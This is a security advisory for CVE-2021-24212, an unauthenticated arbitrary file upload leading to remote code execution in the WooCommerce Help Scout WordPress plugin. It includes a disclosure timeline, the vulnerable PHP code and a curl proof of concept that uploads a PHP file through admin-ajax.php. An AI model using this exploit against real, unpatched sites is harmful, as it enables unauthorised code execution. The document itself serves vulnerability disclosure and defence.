WooCommerce Help Scout < 2.9.1 – Unauthenticated Arbitrary File Upload leading to RCE | CVE 2021-24212

Description

We noticed 0-day in the plugin (https://woocommerce.com/products/woocommerce-help-scout/) being actively exploited. This vulnerability affects at least versions 2.6-2.8 (current latest published version) and allows unauthenticated users to upload any files to the site which by default will end up in wp-content/uploads/hstmp.

Until a patch is available, the plugin should be disabled.

Timeline (WPScanTeam):
March 20th, 2021:
- Tried to reach the vendor via https://opmc.com.au, got blocked when sending contact message "Access from your Country was disabled by the administrator."
- Tried to open a ticket on woocommerce.com, couldn't even though email address was verified
- 2:49pm GMT+1, Reached WooCommerce via DM on Twitter, asking for a direct contact/email address. Reply received at 6:52pm GMT+1
- 8:42pm GMT+1 Details sent to that email address
March 23rd, 2021 - v2.9 released, which does not fix the issue. Vendor is working on another fix and we are in touch with them
March 25th, 2021 - v2.9.1 released, fixing the arbitrary PHP upload. However, an image with PHP code inside could still be uploaded and used in combination with a LFI. Hardening recommendation sent to vendor.

Proof of Concept

In file /woocommerce-help-scout/includes/class-wc-help-scout-ajax.php there is class WC_Help_Scout_Ajax

with constructor initializing action

add_action( 'wp_ajax_nopriv_wc_help_scout_upload_attachments', array( $this, 'wc_help_scout_upload_attachments' ) );

which reads uploaded $_FILES and then executes 

        $target_path_sia = $_FILES["file"]["name"];
                move_uploaded_file($_FILES["file"]["tmp_name"],$dir. "/hstmp/" . $target_path_sia);


Ie. attacker can run 

echo '<?php echo "Hello World!";' > helloworld.php

curl -X POST -F file=@helloworld.php https://<site>/wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments

to exploit this vuln.